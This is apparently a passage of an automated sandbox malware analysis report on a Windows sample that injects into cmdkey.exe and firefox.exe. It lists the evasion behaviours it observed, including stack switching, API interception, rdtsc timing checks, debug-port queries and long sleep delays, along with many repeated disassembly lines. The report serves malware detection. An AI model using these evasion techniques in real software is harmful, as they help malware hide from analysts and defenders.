        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeAPI/Special instruction interceptor: Address: 37411BF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeAPI/Special instruction interceptor: Address: 25211BF
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF81028D144
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF81028D604
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF81028D764
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF81028D324
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF81028D364
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF81028D004
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF81028FF74
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI/Special instruction interceptor: Address: 7FF81028D864
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 rdtsc 3_2_33941763
        Source: C:\Windows\SysWOW64\cmdkey.exeWindow / User API: threadDelayed 9038Jump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeAPI coverage: 0.2 %
        Source: C:\Windows\SysWOW64\cmdkey.exeAPI coverage: 3.1 %
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1976Thread sleep count: 121 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1976Thread sleep time: -242000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1976Thread sleep count: 9038 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 1976Thread sleep time: -18076000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmdkey.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405451
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00405E95 FindFirstFileA,FindClose,0_2_00405E95
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_00402645 FindFirstFileA,3_2_00402645
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_00405451 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405451
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_00405E95 FindFirstFileA,FindClose,3_2_00405E95
        Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 5_2_0301C710 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C710
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: aypAdCUEzlG.exe, 00000006.00000002.21524645275.00000000011FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
        Source: ImBm40hNZ2.exe, 00000003.00000003.17166330810.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17212781148.0000000003148000.00000004.00000020.00020000.00000000.sdmp, ImBm40hNZ2.exe, 00000003.00000002.17213048209.00000000031A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: cmdkey.exe, 00000005.00000002.21523901420.00000000030ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: firefox.exe, 00000007.00000002.17499732783.000001BA8D766000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWW
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeAPI call chain: ExitProcess graph end nodegraph_0-3738
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeAPI call chain: ExitProcess graph end nodegraph_0-3895
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\cmdkey.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 rdtsc 3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_0040231C RegCreateKeyExA,lstrlenA,LdrInitializeThunk,RegSetValueExA,RegCloseKey,0_2_0040231C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 0_2_00405EBC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EBC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392A390 mov eax, dword ptr fs:[00000030h]3_2_3392A390
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392A390 mov eax, dword ptr fs:[00000030h]3_2_3392A390
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392A390 mov eax, dword ptr fs:[00000030h]3_2_3392A390
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33901380 mov eax, dword ptr fs:[00000030h]3_2_33901380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33901380 mov eax, dword ptr fs:[00000030h]3_2_33901380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33901380 mov eax, dword ptr fs:[00000030h]3_2_33901380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33901380 mov eax, dword ptr fs:[00000030h]3_2_33901380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33901380 mov eax, dword ptr fs:[00000030h]3_2_33901380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391F380 mov eax, dword ptr fs:[00000030h]3_2_3391F380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391F380 mov eax, dword ptr fs:[00000030h]3_2_3391F380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391F380 mov eax, dword ptr fs:[00000030h]3_2_3391F380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391F380 mov eax, dword ptr fs:[00000030h]3_2_3391F380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391F380 mov eax, dword ptr fs:[00000030h]3_2_3391F380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391F380 mov eax, dword ptr fs:[00000030h]3_2_3391F380
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF38A mov eax, dword ptr fs:[00000030h]3_2_339BF38A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397C3B0 mov eax, dword ptr fs:[00000030h]3_2_3397C3B0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339093A6 mov eax, dword ptr fs:[00000030h]3_2_339093A6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339093A6 mov eax, dword ptr fs:[00000030h]3_2_339093A6
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339333D0 mov eax, dword ptr fs:[00000030h]3_2_339333D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339343D0 mov ecx, dword ptr fs:[00000030h]3_2_339343D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FC3C7 mov eax, dword ptr fs:[00000030h]3_2_338FC3C7
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339843D5 mov eax, dword ptr fs:[00000030h]3_2_339843D5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FE3C0 mov eax, dword ptr fs:[00000030h]3_2_338FE3C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FE3C0 mov eax, dword ptr fs:[00000030h]3_2_338FE3C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FE3C0 mov eax, dword ptr fs:[00000030h]3_2_338FE3C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339063CB mov eax, dword ptr fs:[00000030h]3_2_339063CB
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391E310 mov eax, dword ptr fs:[00000030h]3_2_3391E310
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391E310 mov eax, dword ptr fs:[00000030h]3_2_3391E310
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3391E310 mov eax, dword ptr fs:[00000030h]3_2_3391E310
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F9303 mov eax, dword ptr fs:[00000030h]3_2_338F9303
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F9303 mov eax, dword ptr fs:[00000030h]3_2_338F9303
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393631F mov eax, dword ptr fs:[00000030h]3_2_3393631F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF30A mov eax, dword ptr fs:[00000030h]3_2_339BF30A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398330C mov eax, dword ptr fs:[00000030h]3_2_3398330C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398330C mov eax, dword ptr fs:[00000030h]3_2_3398330C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398330C mov eax, dword ptr fs:[00000030h]3_2_3398330C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398330C mov eax, dword ptr fs:[00000030h]3_2_3398330C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FE328 mov eax, dword ptr fs:[00000030h]3_2_338FE328
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FE328 mov eax, dword ptr fs:[00000030h]3_2_338FE328
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FE328 mov eax, dword ptr fs:[00000030h]3_2_338FE328
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D3336 mov eax, dword ptr fs:[00000030h]3_2_339D3336
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33938322 mov eax, dword ptr fs:[00000030h]3_2_33938322
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33938322 mov eax, dword ptr fs:[00000030h]3_2_33938322
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33938322 mov eax, dword ptr fs:[00000030h]3_2_33938322
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392332D mov eax, dword ptr fs:[00000030h]3_2_3392332D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393A350 mov eax, dword ptr fs:[00000030h]3_2_3393A350
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F8347 mov eax, dword ptr fs:[00000030h]3_2_338F8347
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F8347 mov eax, dword ptr fs:[00000030h]3_2_338F8347
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F8347 mov eax, dword ptr fs:[00000030h]3_2_338F8347
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E372 mov eax, dword ptr fs:[00000030h]3_2_3397E372
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E372 mov eax, dword ptr fs:[00000030h]3_2_3397E372
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E372 mov eax, dword ptr fs:[00000030h]3_2_3397E372
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E372 mov eax, dword ptr fs:[00000030h]3_2_3397E372
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392237A mov eax, dword ptr fs:[00000030h]3_2_3392237A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33980371 mov eax, dword ptr fs:[00000030h]3_2_33980371
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33980371 mov eax, dword ptr fs:[00000030h]3_2_33980371
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B360 mov eax, dword ptr fs:[00000030h]3_2_3390B360
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B360 mov eax, dword ptr fs:[00000030h]3_2_3390B360
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B360 mov eax, dword ptr fs:[00000030h]3_2_3390B360
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B360 mov eax, dword ptr fs:[00000030h]3_2_3390B360
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B360 mov eax, dword ptr fs:[00000030h]3_2_3390B360
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390B360 mov eax, dword ptr fs:[00000030h]3_2_3390B360
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393E363 mov eax, dword ptr fs:[00000030h]3_2_3393E363
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393E363 mov eax, dword ptr fs:[00000030h]3_2_3393E363
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393E363 mov eax, dword ptr fs:[00000030h]3_2_3393E363
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393E363 mov eax, dword ptr fs:[00000030h]3_2_3393E363
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393E363 mov eax, dword ptr fs:[00000030h]3_2_3393E363
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393E363 mov eax, dword ptr fs:[00000030h]3_2_3393E363
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393E363 mov eax, dword ptr fs:[00000030h]3_2_3393E363
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393E363 mov eax, dword ptr fs:[00000030h]3_2_3393E363
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33907290 mov eax, dword ptr fs:[00000030h]3_2_33907290
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33907290 mov eax, dword ptr fs:[00000030h]3_2_33907290
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33907290 mov eax, dword ptr fs:[00000030h]3_2_33907290
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397E289 mov eax, dword ptr fs:[00000030h]3_2_3397E289
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F92AF mov eax, dword ptr fs:[00000030h]3_2_338F92AF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339DB2BC mov eax, dword ptr fs:[00000030h]3_2_339DB2BC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339DB2BC mov eax, dword ptr fs:[00000030h]3_2_339DB2BC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339DB2BC mov eax, dword ptr fs:[00000030h]3_2_339DB2BC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339DB2BC mov eax, dword ptr fs:[00000030h]3_2_339DB2BC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF2AE mov eax, dword ptr fs:[00000030h]3_2_339BF2AE
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C92AB mov eax, dword ptr fs:[00000030h]3_2_339C92AB
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339242AF mov eax, dword ptr fs:[00000030h]3_2_339242AF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339242AF mov eax, dword ptr fs:[00000030h]3_2_339242AF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FC2B0 mov ecx, dword ptr fs:[00000030h]3_2_338FC2B0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339332C0 mov eax, dword ptr fs:[00000030h]3_2_339332C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339332C0 mov eax, dword ptr fs:[00000030h]3_2_339332C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D32C9 mov eax, dword ptr fs:[00000030h]3_2_339D32C9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339232C5 mov eax, dword ptr fs:[00000030h]3_2_339232C5
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FD2EC mov eax, dword ptr fs:[00000030h]3_2_338FD2EC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FD2EC mov eax, dword ptr fs:[00000030h]3_2_338FD2EC
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339102F9 mov eax, dword ptr fs:[00000030h]3_2_339102F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339102F9 mov eax, dword ptr fs:[00000030h]3_2_339102F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339102F9 mov eax, dword ptr fs:[00000030h]3_2_339102F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339102F9 mov eax, dword ptr fs:[00000030h]3_2_339102F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339102F9 mov eax, dword ptr fs:[00000030h]3_2_339102F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339102F9 mov eax, dword ptr fs:[00000030h]3_2_339102F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339102F9 mov eax, dword ptr fs:[00000030h]3_2_339102F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339102F9 mov eax, dword ptr fs:[00000030h]3_2_339102F9
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F72E0 mov eax, dword ptr fs:[00000030h]3_2_338F72E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390A2E0 mov eax, dword ptr fs:[00000030h]3_2_3390A2E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390A2E0 mov eax, dword ptr fs:[00000030h]3_2_3390A2E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390A2E0 mov eax, dword ptr fs:[00000030h]3_2_3390A2E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390A2E0 mov eax, dword ptr fs:[00000030h]3_2_3390A2E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390A2E0 mov eax, dword ptr fs:[00000030h]3_2_3390A2E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390A2E0 mov eax, dword ptr fs:[00000030h]3_2_3390A2E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339082E0 mov eax, dword ptr fs:[00000030h]3_2_339082E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339082E0 mov eax, dword ptr fs:[00000030h]3_2_339082E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339082E0 mov eax, dword ptr fs:[00000030h]3_2_339082E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339082E0 mov eax, dword ptr fs:[00000030h]3_2_339082E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398B214 mov eax, dword ptr fs:[00000030h]3_2_3398B214
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398B214 mov eax, dword ptr fs:[00000030h]3_2_3398B214
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FA200 mov eax, dword ptr fs:[00000030h]3_2_338FA200
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F821B mov eax, dword ptr fs:[00000030h]3_2_338F821B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33920230 mov ecx, dword ptr fs:[00000030h]3_2_33920230
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393A22B mov eax, dword ptr fs:[00000030h]3_2_3393A22B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393A22B mov eax, dword ptr fs:[00000030h]3_2_3393A22B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393A22B mov eax, dword ptr fs:[00000030h]3_2_3393A22B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33980227 mov eax, dword ptr fs:[00000030h]3_2_33980227
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33980227 mov eax, dword ptr fs:[00000030h]3_2_33980227
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33980227 mov eax, dword ptr fs:[00000030h]3_2_33980227
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397D250 mov eax, dword ptr fs:[00000030h]3_2_3397D250
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397D250 mov ecx, dword ptr fs:[00000030h]3_2_3397D250
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C124C mov eax, dword ptr fs:[00000030h]3_2_339C124C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C124C mov eax, dword ptr fs:[00000030h]3_2_339C124C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C124C mov eax, dword ptr fs:[00000030h]3_2_339C124C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C124C mov eax, dword ptr fs:[00000030h]3_2_339C124C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392F24A mov eax, dword ptr fs:[00000030h]3_2_3392F24A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF247 mov eax, dword ptr fs:[00000030h]3_2_339BF247
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399327E mov eax, dword ptr fs:[00000030h]3_2_3399327E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399327E mov eax, dword ptr fs:[00000030h]3_2_3399327E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399327E mov eax, dword ptr fs:[00000030h]3_2_3399327E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399327E mov eax, dword ptr fs:[00000030h]3_2_3399327E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399327E mov eax, dword ptr fs:[00000030h]3_2_3399327E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3399327E mov eax, dword ptr fs:[00000030h]3_2_3399327E
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BD270 mov eax, dword ptr fs:[00000030h]3_2_339BD270
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB273 mov eax, dword ptr fs:[00000030h]3_2_338FB273
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB273 mov eax, dword ptr fs:[00000030h]3_2_338FB273
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FB273 mov eax, dword ptr fs:[00000030h]3_2_338FB273
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941190 mov eax, dword ptr fs:[00000030h]3_2_33941190
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941190 mov eax, dword ptr fs:[00000030h]3_2_33941190
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33929194 mov eax, dword ptr fs:[00000030h]3_2_33929194
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33904180 mov eax, dword ptr fs:[00000030h]3_2_33904180
